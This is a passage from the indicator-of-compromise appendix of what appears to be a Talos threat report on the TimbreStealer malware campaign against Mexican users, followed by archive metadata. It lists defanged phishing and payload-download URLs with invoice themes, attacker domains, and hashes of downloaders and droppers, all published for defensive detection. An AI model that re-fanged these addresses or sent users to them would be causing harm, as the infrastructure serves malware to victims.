URLs\r\nhxxp://folio24[.]spacefordailyrituals[.]com/facdigital/55ae12184283dc\r\nhxxp://folio47[.]marcialledo[.]com/seg_factura/e6bab6d032e282\r\nhxxp://pdf43[.]marcialledo[.]com/factura/50e1e86db86ff2\r\nhxxp://suscripcion95[.]servicioslomex[.]online/cfdi/0faa4a21fff2bb\r\nhxxps://0[.]solucionegos[.]top/timbreDigital/e99522f778ea6a\r\nhxxps://auditoria38[.]meinastrohoroskop[.]com/factura/b5b0c16b999573\r\nhxxps://auditoria42[.]altavista100[.]com/factura/b20569ae393e7e\r\nhxxps://auditoria67[.]mariageorgina[.]com/cfdi/bb743b25f5c526\r\nhxxps://auditoria7[.]miramantolama[.]com/factura/d84d576baf1513\r\nhxxps://auditoria82[.]taoshome4sale[.]com/seg_factura/efebfc104991d4\r\nhxxps://auditoria84[.]meinastrohoroskop[.]com/timbreDigital/8f7b2f8304d08e\r\nhxxps://auditoria88[.]mariageorgina[.]com/factura/3db4832ada4f80\r\nhxxps://auditoria89[.]venagard[.]com/timbreDigital/f6a5f34123d980\r\nhxxps://auditoria92[.]venagard[.]com/factura/2c6652a143f815\r\nhxxps://auditoria93[.]serragrandreunion[.]com/timbreDigital/a2e79b61ac4635\r\nhxxps://comprobante14[.]miramantolama[.]com/seg_factura/fb0b02b2d41b12\r\nhxxps://comprobante2[.]marcialledo[.]com/factura/3ce069ac2b865e\r\nhxxps://comprobante27[.]mariageorgina[.]com/timbreDigital/eada68119275aa\r\nhxxps://comprobante27[.]serragrandreunion[.]com/facdigital/bca7513c9e00b9\r\nhxxps://comprobante27[.]servicioslocomer[.]online/factura/2003b3fe7ae6f4\r\nhxxps://comprobante45[.]altavista100[.]com/cfdi/d13011c95ba2b0\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 24 of 36\n\nhxxps://comprobante51[.]meinastrohoroskop[.]com/facdigital/121c0388193ba5\r\nhxxps://comprobante63[.]serragrandreunion[.]com/facdigital/3c45bca741d4f6\r\nhxxps://comprobante68[.]portafoliocfdi[.]com/seg_factura/58c0146a753186\r\nhxxps://comprobante70[.]miramantolama[.]com/timbreDigital/18665ae0a7b9e1\r\nhxxps://comprobante75[.]meinastrohoroskop[.]com/timbreDigital/bfa30824f1120b\r\nhxxps://comprobante80[.]serragrandreunion[.]com/timbreDigital/bf4a8735ed3953\r\nhxxps://comprobante91[.]servicioslocomer[.]online/timbreDigital/adb6403b186182\r\nhxxps://comprobante93[.]venagard[.]com/cfdi/57880f98ef2b70\r\nhxxps://cumplimiento19[.]altavista100[.]com/timbreDigital/dd141e683a3056\r\nhxxps://cumplimiento35[.]solucionegos[.]top/factura/bde64155cabbe5\r\nhxxps://cumplimiento39[.]meinastrohoroskop[.]com/seg_factura/d4e9d7823adff2\r\nhxxps://cumplimiento43[.]commerxion[.]buzz/facdigital/1ac5acb1a5525b\r\nhxxps://cumplimiento47[.]solucionegos[.]top/seg_factura/7fa6018dc9b68f\r\nhxxps://cumplimiento48[.]callarlene[.]net/seg_factura/c19a0dd4addc3e\r\nhxxps://cumplimiento56[.]timbradoelectronico[.]com/facdigital/dd37434dcde7ad\r\nhxxps://cumplimiento72[.]serragrandreunion[.]com/seg_factura/92cd2425a6c150\r\nhxxps://cumplimiento81[.]paulfenelon[.]com/cfdi/20149ee8e1d3b2\r\nhxxps://cumplimiento91[.]miramantolama[.]com/seg_factura/e907d32bf0d056\r\nhxxps://cumplimiento94[.]meinastrohoroskop[.]com/cfdi/bd56529f9d1411\r\nhxxps://cumplimiento98[.]serragrandreunion[.]com/factura/3f209bc16cbb9a\r\nhxxps://factura10[.]miramantolama[.]com/factura/039d9cbaeec9b5\r\nhxxps://factura20[.]facturascorporativas[.]com/seg_factura/9622cf8c695873\r\nhxxps://factura20[.]solunline[.]top/cfdi/6401eac16211b2\r\nhxxps://factura34[.]changjiangys[.]net/facdigital/52490c838bd94f\r\nhxxps://factura4[.]servicioslocomer[.]online/cfdi/f2369d09a54ad9\r\nhxxps://factura40[.]miramantolama[.]com/cfdi/9318466130e6af\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 25 of 36\n\nhxxps://factura44[.]servicioslocales[.]online/cfdi/25e8a6f5393e1f\r\nhxxps://factura46[.]facturasfiel[.]com/factura/021bd5fa122bb2\r\nhxxps://factura49[.]marcialledo[.]com/factura/fc2cc5bf671dd0\r\nhxxps://factura50[.]callarlene[.]net/cfdi/867d138f26fb23\r\nhxxps://factura59[.]altavista100[.]com/seg_factura/0179ae05a51830\r\nhxxps://factura7[.]taoshome4sale[.]com/factura/eebf49f810a0a6\r\nhxxps://factura71[.]servicioslomex[.]online/timbreDigital/5de7db415c7e8e\r\nhxxps://factura72[.]serragrandreunion[.]com/seg_factura/728423dceff50c\r\nhxxps://factura73[.]mariageorgina[.]com/cfdi/71deea8cdbcb10\r\nhxxps://factura81[.]altavista100[.]com/factura/8421cd5cb1c8e4\r\nhxxps://factura90[.]changjiangys[.]net/timbreDigital/029a6531330379\r\nhxxps://factura91[.]servicioslocomer[.]online/timbreDigital/2952b54a9542f1\r\nhxxps://folio24[.]serragrandreunion[.]com/seg_factura/548b685f48dd30\r\nhxxps://folio24[.]spacefordailyrituals[.]com/facdigital/55ae12184283dc\r\nhxxps://folio47[.]marcialledo[.]com/seg_factura/e6bab6d032e282\r\nhxxps://folio53[.]mariageorgina[.]com/seg_factura/ca2fd939c046fa\r\nhxxps://folio60[.]callarlene[.]net/seg_factura/367b377baf47e5\r\nhxxps://folio75[.]taoshome4sale[.]com/cfdi/7482bf3f2690af\r\nhxxps://folio75[.]venagard[.]com/cfdi/7718efe0fd3952\r\nhxxps://folio76[.]miramantolama[.]com/cfdi/a74b25b75c7182\r\nhxxps://folio83[.]altavista100[.]com/factura/20f00b7d569c85\r\nhxxps://folio89[.]changjiangys[.]net/factura/b645784e80f71a\r\nhxxps://folio90[.]servicioslocomer[.]online/facdigital/d1950dc8f24757\r\nhxxps://folio99[.]solunline[.]top/facdigital/b7928d4e0eade5\r\nhxxps://pdf21[.]changjiangys[.]net/cfdi/2f99e7adf61c47\r\nhxxps://pdf33[.]venagard[.]com/timbreDigital/91849e7d9fe4ad\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 26 of 36\n\nhxxps://pdf34[.]solucionpiens[.]top/seg_factura/2dfed5bc7fcbf6\r\nhxxps://pdf39[.]facturasonlinemx[.]com/seg_factura/66971f3669145a\r\nhxxps://pdf49[.]marcialledo[.]com/factura/729c18972d690c\r\nhxxps://pdf50[.]changjiangys[.]net/factura/cdb5ed3876c4bf\r\nhxxps://pdf57[.]visual8298[.]top/factura/5239e15a8324ab\r\nhxxps://pdf59[.]venagard[.]com/cfdi/5791bf23c6929e\r\nhxxps://pdf63[.]paulfenelon[.]com/timbreDigital/3ae250718da0ca\r\nhxxps://pdf65[.]verificatutramite[.]com/facdigital/e1ec8098e50a0b\r\nhxxps://pdf70[.]mariageorgina[.]com/cfdi/fab1264f158f44\r\nhxxps://pdf81[.]photographyride[.]com/seg_factura/4eb3832fe6d1bd\r\nhxxps://pdf85[.]miramantolama[.]com/factura/74f871b7ca1977\r\nhxxps://pdf93[.]venagard[.]com/factura/f24a53f8932b3f\r\nhxxps://pdf98[.]solunline[.]top/timbreDigital/f57e558c31a86e\r\nhxxps://portal27[.]marcialledo[.]com/timbreDigital/f8a5f05b3c1651\r\nhxxps://portal34[.]solunline[.]top/cfdi/a068bb0da7eea1\r\nhxxps://portal48[.]solucionpiens[.]top/timbreDigital/15ec5fc2aaf26a\r\nhxxps://portal50[.]solucionegos[.]top/factura/8d4c6f7e2a4c7f\r\nhxxps://portal55[.]solucionegos[.]top/seg_factura/f5f59070b20629\r\nhxxps://portal63[.]paulfenelon[.]com/seg_factura/77907fa76c7c59\r\nhxxps://portal70[.]solunline[.]top/timbreDigital/92b380d91a67a0\r\nhxxps://portal80[.]changjiangys[.]net/cfdi/2224782a3b7f1d\r\nhxxps://portal86[.]serragrandreunion[.]com/facdigital/68da4282591283\r\nhxxps://portal90[.]meinastrohoroskop[.]com/factura/64f247c6238c38\r\nhxxps://portal92[.]solucionpiens[.]top/timbreDigital/34893de446d532\r\nhxxps://suscripcion0[.]venagard[.]com/timbreDigital/5c86c63ca1ffda\r\nhxxps://suscripcion10[.]solunline[.]xyz/facdigital/ebe0cb51090e51\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 27 of 36\n\nhxxps://suscripcion24[.]facturasonlinemx[.]com/factura/d6a6f8208ed508\r\nhxxps://suscripcion24[.]venagard[.]com/timbreDigital/50c6f1fad17f5e\r\nhxxps://suscripcion32[.]servicioslocomer[.]online/facdigital/22ccd8880c217e\r\nhxxps://suscripcion38[.]eagleservice[.]buzz/cfdi/6dadfe1a18cffc\r\nhxxps://suscripcion38[.]mariageorgina[.]com/factura/9c787623800b5e\r\nhxxps://suscripcion57[.]changjiangys[.]net/factura/22ad73593f724a\r\nhxxps://suscripcion65[.]g1ooseradas[.]buzz/factura/9f03d9ef3d73b5\r\nhxxps://suscripcion84[.]taoshome4sale[.]com/cfdi/e4af3e6e22a8a6\r\nhxxps://suscripcion95[.]servicioslomex[.]online/cfdi/0faa4a21fff2bb\r\nhxxps://timbrado0[.]meinastrohoroskop[.]com/cfdi/515c9b9087c737\r\nhxxps://timbrado11[.]verificatutramite[.]com/facdigital/f7640878ebc0f9\r\nhxxps://timbrado16[.]taoshome4sale[.]com/timbreDigital/259029c9d7f330\r\nhxxps://timbrado17[.]marcialledo[.]com/factura/2ea580ee99d5f1\r\nhxxps://timbrado17[.]mariageorgina[.]com/seg_factura/95a6c2c0e004d8\r\nhxxps://timbrado2[.]serviciosna[.]top/facdigital/c5cb33d68be323\r\nhxxps://timbrado2[.]solucionegos[.]top/seg_factura/7c867709e85c67\r\nhxxps://timbrado33[.]meinastrohoroskop[.]com/timbreDigital/aaf2cc575db42c\r\nhxxps://timbrado42[.]mariageorgina[.]com/facdigital/f0f82ab0c87b32\r\nhxxps://timbrado54[.]changjiangys[.]net/cfdi/04e4e38338d82a\r\nhxxps://timbrado6[.]meinastrohoroskop[.]com/cfdi/5290b37e80850a\r\nhxxps://timbrado73[.]mariageorgina[.]com/timbreDigital/ff862f9245e8b6\r\nhxxps://timbrado74[.]callarlene[.]net/timbreDigital/eb52e334a2c0b3\r\nhxxps://timbrado74[.]mexicofacturacion[.]com/factura/14fcb6e3eaf351\r\nhxxps://timbrado80[.]paulfenelon[.]com/timbreDigital/684bc3f7d7e7f9\r\nhxxps://timbrado84[.]miramantolama[.]com/cfdi/18864dcecc9e9c\r\nhxxps://timbrado90[.]porcesososo[.]online/factura/cde31eb6fcac1d\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 28 of 36\n\nhxxps://timbrado96[.]paulfenelon[.]com/facdigital/ef18828525a8fb\r\nhxxps://validacion22[.]hb56[.]cc/seg_factura/8f845f6ba70820\r\nhxxps://trilivok[.]com/2ysz0gghg/cbt0mer/it.php?f=2\u0026w=Windows%2010 \r\nhxxps://trilivok[.]com/3s9p2w9yy/bvhcc5x/it.php?f=9\u0026w=Windows%2010\r\nhxxps://chidoriland[.]com/1r49ucc73/hs4q07q/it.php?f=2\u0026w=Windows%2010\r\nhxxps://manderlyx[.]com/cruto/it.php?f=2\u0026w=Windows%2010\r\nhxxps://bailandolambada[.]com/5iplivg7q/gn4md5c/it.php?f=2\u0026w=Windows%2010\r\nDomains\r\ntrilivok[.]com\r\nchidoriland[.]com\r\nmanderlyx[.]com\r\nbailandolambada[.]com\r\n0[.]solucionegos[.]top\r\nauditoria38[.]meinastrohoroskop[.]com\r\nauditoria42[.]altavista100[.]com\r\nauditoria67[.]mariageorgina[.]com\r\nauditoria7[.]miramantolama[.]com\r\nauditoria82[.]taoshome4sale[.]com\r\nauditoria84[.]meinastrohoroskop[.]com\r\nauditoria88[.]mariageorgina[.]com\r\nauditoria89[.]venagard[.]com\r\nauditoria92[.]venagard[.]com\r\nauditoria93[.]serragrandreunion[.]com\r\ncomprobante14[.]miramantolama[.]com\r\ncomprobante2[.]marcialledo[.]com\r\ncomprobante27[.]mariageorgina[.]com\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 29 of 36\n\ncomprobante27[.]serragrandreunion[.]com\r\ncomprobante27[.]servicioslocomer[.]online\r\ncomprobante45[.]altavista100[.]com\r\ncomprobante51[.]meinastrohoroskop[.]com\r\ncomprobante63[.]serragrandreunion[.]com\r\ncomprobante68[.]portafoliocfdi[.]com\r\ncomprobante70[.]miramantolama[.]com\r\ncomprobante75[.]meinastrohoroskop[.]com\r\ncomprobante80[.]serragrandreunion[.]com\r\ncomprobante91[.]servicioslocomer[.]online\r\ncomprobante93[.]venagard[.]com\r\ncumplimiento19[.]altavista100[.]com\r\ncumplimiento35[.]solucionegos[.]top\r\ncumplimiento39[.]meinastrohoroskop[.]com\r\ncumplimiento43[.]commerxion[.]buzz\r\ncumplimiento47[.]solucionegos[.]top\r\ncumplimiento48[.]callarlene[.]net\r\ncumplimiento56[.]timbradoelectronico[.]com\r\ncumplimiento72[.]serragrandreunion[.]com\r\ncumplimiento81[.]paulfenelon[.]com\r\ncumplimiento91[.]miramantolama[.]com\r\ncumplimiento94[.]meinastrohoroskop[.]com\r\ncumplimiento98[.]serragrandreunion[.]com\r\nfactura10[.]miramantolama[.]com\r\nfactura20[.]facturascorporativas[.]com\r\nfactura20[.]solunline[.]top\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 30 of 36\n\nfactura34[.]changjiangys[.]net\r\nfactura4[.]servicioslocomer[.]online\r\nfactura40[.]miramantolama[.]com\r\nfactura44[.]servicioslocales[.]online\r\nfactura46[.]facturasfiel[.]com\r\nfactura49[.]marcialledo[.]com\r\nfactura50[.]callarlene[.]net\r\nfactura59[.]altavista100[.]com\r\nfactura7[.]taoshome4sale[.]com\r\nfactura71[.]servicioslomex[.]online\r\nfactura72[.]serragrandreunion[.]com\r\nfactura73[.]mariageorgina[.]com\r\nfactura81[.]altavista100[.]com\r\nfactura90[.]changjiangys[.]net\r\nfactura91[.]servicioslocomer[.]online\r\nfolio24[.]serragrandreunion[.]com\r\nfolio24[.]spacefordailyrituals[.]com\r\nfolio47[.]marcialledo[.]com\r\nfolio53[.]mariageorgina[.]com\r\nfolio60[.]callarlene[.]net\r\nfolio75[.]taoshome4sale[.]com\r\nfolio75[.]venagard[.]com\r\nfolio76[.]miramantolama[.]com\r\nfolio83[.]altavista100[.]com\r\nfolio89[.]changjiangys[.]net\r\nfolio90[.]servicioslocomer[.]online\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 31 of 36\n\nfolio99[.]solunline[.]top\r\npdf21[.]changjiangys[.]net\r\npdf33[.]venagard[.]com\r\npdf34[.]solucionpiens[.]top\r\npdf39[.]facturasonlinemx[.]com\r\npdf43[.]marcialledo[.]com\r\npdf49[.]marcialledo[.]com\r\npdf50[.]changjiangys[.]net\r\npdf57[.]visual8298[.]top\r\npdf59[.]venagard[.]com\r\npdf63[.]paulfenelon[.]com\r\npdf65[.]verificatutramite[.]com\r\npdf70[.]mariageorgina[.]com\r\npdf81[.]photographyride[.]com\r\npdf85[.]miramantolama[.]com\r\npdf93[.]venagard[.]com\r\npdf98[.]solunline[.]top\r\nportal27[.]marcialledo[.]com\r\nportal34[.]solunline[.]top\r\nportal48[.]solucionpiens[.]top\r\nportal50[.]solucionegos[.]top\r\nportal55[.]solucionegos[.]top\r\nportal63[.]paulfenelon[.]com\r\nportal70[.]solunline[.]top\r\nportal80[.]changjiangys[.]net\r\nportal86[.]serragrandreunion[.]com\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 32 of 36\n\nportal90[.]meinastrohoroskop[.]com\r\nportal92[.]solucionpiens[.]top\r\nsuscripcion0[.]venagard[.]com\r\nsuscripcion10[.]solunline[.]xyz\r\nsuscripcion24[.]facturasonlinemx[.]com\r\nsuscripcion24[.]venagard[.]com\r\nsuscripcion32[.]servicioslocomer[.]online\r\nsuscripcion38[.]eagleservice[.]buzz\r\nsuscripcion38[.]mariageorgina[.]com\r\nsuscripcion57[.]changjiangys[.]net\r\nsuscripcion65[.]g1ooseradas[.]buzz\r\nsuscripcion84[.]taoshome4sale[.]com\r\nsuscripcion95[.]servicioslomex[.]online\r\ntimbrado0[.]meinastrohoroskop[.]com\r\ntimbrado11[.]verificatutramite[.]com\r\ntimbrado16[.]taoshome4sale[.]com\r\ntimbrado17[.]marcialledo[.]com\r\ntimbrado17[.]mariageorgina[.]com\r\ntimbrado2[.]serviciosna[.]top\r\ntimbrado2[.]solucionegos[.]top\r\ntimbrado33[.]meinastrohoroskop[.]com\r\ntimbrado42[.]mariageorgina[.]com\r\ntimbrado54[.]changjiangys[.]net\r\ntimbrado6[.]meinastrohoroskop[.]com\r\ntimbrado73[.]mariageorgina[.]com\r\ntimbrado74[.]callarlene[.]net\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 33 of 36\n\ntimbrado74[.]mexicofacturacion[.]com\r\ntimbrado80[.]paulfenelon[.]com\r\ntimbrado84[.]miramantolama[.]com\r\ntimbrado90[.]porcesososo[.]online\r\ntimbrado96[.]paulfenelon[.]com\r\nvalidacion22[.]hb56[.]cc\r\nJavaScript Files\r\n600d085638335542de1c06a012ec9d4c56ffe0373a5f61667158fc63894dde9f  (Downloader)\r\n883674fa4c562f04685a2b733747e4070fe927e1db1443f9073f31dd0cb5e215  (Region check and redirect)\r\n.URL Files\r\nb1b85c821a7f3b5753becbbfa19d2e80e7dcbd5290d6d831fb07e91a21bdeaa7  CFDI_930209.zip\r\ne04cee863791c26a275e0c06620ea7403c736f8cafbdda3417f854ae5d81a49f  FACTURA_560208.zip\r\naa187a53e55396238e97638032424d68ba2402259f2b308c9911777712b526af \r\nFAC_560208_ATR890126GK2.url_\r\n66af21ef63234c092441ec33351df0f829f08a2f48151557eb7a084c6275b791  FAC_930209_FME140910KI4.url_\r\nEmbedded Binaries\r\nb3f4b207ee83b748f3ae83b90d1536f9c5321a84d9064dc9745683a93e5ec405  Cecujujajofubo475.dll_\r\ne87325f4347f66b21b19cfb21c51fbf99ead6b63e1796fcb57cd2260bd720929  blob.dll_\r\n103d3e03ce4295737ef9b2b9dfef425d93238a09b1eb738ac0e05da0c6c50028  blob.dll_\r\na579bd30e9ee7984489af95cffb2e8e6877873fd881aa18d7f5a2177d76f7bf2  blob.dll\r\nb01e917dd14c780cb52cafcd14e4dd499c33822c7776d084d29cf5e0bb0bddb6  blob.dll_\r\n795c0b82b37d339ea27014d73ad8f2d28c5066a7ceb6a2aa0d74188df9c311c9  blob.dll_\r\n07521bd6acf725b8a33d1d91fd0cc7830d2cff66abdb24616c2076b63d3f36a8  blob.dll_\r\n71ce48c89b22e99356c464c1541e2d7b9419a2c8fe8f6058914fc58703ba244f  blob.dll_\r\nba7bc4cff098f49d39e16c224e001bd40a5d08048aeec531f771a54ee4a5ecef  blob.dll_\r\nDropper Binaries\r\n010b48762a033f91b32e315ebcefb8423d2b20019516fa8f2f3d54d57d221bdb\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 34 of 36\n\n024f3c591d44499afb8f477865c557fc15164ab0f35594e0cfdfa76245459762\r\n03cd17df83a7bdf459f16677560e69143d1788ce1fc7927200a09f82859d90ea\r\n075910c802f755d3178a8f1f14ee4cd7924fd4463c7491277bdf2681b16e593c\r\n12bff33da7d9807252bb461d65828154b9b5b1dca505e8173893e3d410d40dd0\r\n1aaa4fb29a88c83495de80893cd2476484af561bb29e8cdfc73ce38f6cd61a84\r\n23b9e4103141d6a898773b1342269334e569bcf576cdcb4a905f24e26320cdab\r\n27c1e41fde9bc0d5027a48ccada1af8c9c8f59937bf5f77edd21e49bd28f29a2\r\n2a225784289f31adbaa8be0b8770495fa8950fce2b7352a0c7a566fc79067547\r\n2a38b75e88f91f9cd28ef478e82c3b44f50e57cb958ba63e58f134d8bd368812\r\n2a3f869e9e78b4d7945a60ceec27586c07bc8b0770be64463358fffe3b6b7395\r\n2e04c36b7ddd6939b7bef258bfeba6f91a5c37a43389dd6d9a88eff5863df5ed\r\n43e99539e4b966dde2f9de8dc1ffb4a22bc560e54c01de9aef6b15fac1412714\r\n46226d4fb7ffe15ba8167e3724f991c543731672e19ef40bb43fddc6df648d0a\r\n46cc07a9287da26e238a74734d87e0aae984f4648a80a26547afa0de8c850afb\r\n51be3a3b4ebd15c305c0f9b57388c449f88f0d6d2d46a0a838f046f0fd21b78f\r\n55b0247b9b574978a4c9abd19c3bcc04ea78598398b9f8aeb35bd51cbd877576\r\n56612bb0ab00cbb7af24326b027a55ff25852ddab1f1c8e24471b7ce97003505\r\n5831f4f8ce715d4a021284e68af1b6d8040a2543484ac84b326eea20c543552e\r\n58562e49c1612f08e56e7d7b3ca6cd78285948018b2998e45bd425b4c79ce1f4\r\n62495620b0d65d94bc3d68dec00ffbe607eacd20ab43dc4471170aa292cc9b1a\r\n682546addb38a938982f0f715b27b4ba5cda4621e63f872f19110d174851c4e9\r\n69019b7b64deb5cc91a58b6a3c5e6b1b6d6665bd40be1381a70690ba2b305790\r\n6bf082f001f914824a6b33f9bdd56d562c081097692221fb887035e80926d583\r\n7923d409959acffab49dda63c7c9c15e1bdd2b5c16f7fcfe8ef3e3108e08df87\r\n7ac22989021082b9a377dcc582812693ce0733e973686b607e8fc2b52dcf181d\r\n8420d77ba61925b03a1ad6c900a528ecacbb2c816b3e6bc62def40fc14e03b78\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 35 of 36\n\n850dd47a0fb5e8b2b4358bf3aa1abd7ebaae577b6fc4b6b4e3d7533313c845b8\r\n96363b2b9e4ed8044cb90b6619842ba8897b4392f9025cbfdccfda1ea7a14a58\r\n97157c8bbeb8769770c4cb2201638d9ad0103ba2fdfed9bdbd03c53bd7a5fcb9\r\na103b0c604ef32e7aabb16c2a7917fd123c41486d8e0a4f43dcf6c48d76de425\r\na82fb82f3aa2f6123d2c0fb954ae558ac6e8862ef756b12136fbe8d533b30573\r\na92934c014a7859bd122717f4c87f6bd31896cb87d28c9fac1a6af57ff8110f6\r\nab2a2465fccd7294580c11492c29a943c54415e0c606f41e08ce86d69e254ee4\r\nababe815e11b762089180e5fb0b1eaffa6a035d630d7aaf1d8060bd5d9a87ea5\r\nb04a0a4a1520c905007a5d370ed2b6c7cb42253f4722cc55a9e475ae9ece1de7\r\nc29b9f79b0a34948bde1dfca3acecca6965795917c7d3444fcacba12f583fb98\r\nc99237a5777a2e8fa7da33460a5b477d155cc26bc2e297a8563516a708323ead\r\nca652fc3a664a772dbf615abfe5df99d9c35f6a869043cf75736e6492fbd4bea\r\nb5a272acd842154b2069b60aab52568bbfde60e59717190c71e787e336598912\r\n5efa99b3cb17bec76fec2724bcfcc6423d0231bba9cf9c1aed63005e4c3c2875\r\nce135a7e0410314126cacb2a2dba3d6d4c17d6ee672c57c097816d64eb427735\r\nd3ff98b196717e66213ccf009cbeed32250da0e2c2748d44f4ee8fb4f704407c\r\n35b7dd775db142699228d3e64ee8e9a02c6d91bb49f7c2faf367df8ba2186fd6\r\ne65e25aee5947747f471407a6cce9137695e4fee820f990883b117726195988c\r\ne8ed09b016ea62058404c482edf988f14a87c790d5c9bd3d2e03885b818ef822\r\nfebf9c5ede3964fdb3b53307a3d5ef7b0e222705a3bb39bef58e28aaba5eed28\r\nff3769c95b8a5cdcba750fda5bbbb92ef79177e3de6dc1143186e893e68d45a4\r\nSource: https://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nhttps://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/\r\nPage 36 of 36",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/"
	],
	"report_names": [
		"timbrestealer-campaign-targets-mexican-users"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439127,
	"ts_updated_at": 1775791458,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/658e0f6fd16ab07688366e37c17cfd418a0e4e59.pdf",
		"text": "https://archive.orkl.eu/658e0f6fd16ab07688366e37c17cfd418a0e4e59.txt",
		"img": "https://archive.orkl.eu/658e0f6fd16ab07688366e37c17cfd418a0e4e59.jpg"
	}
}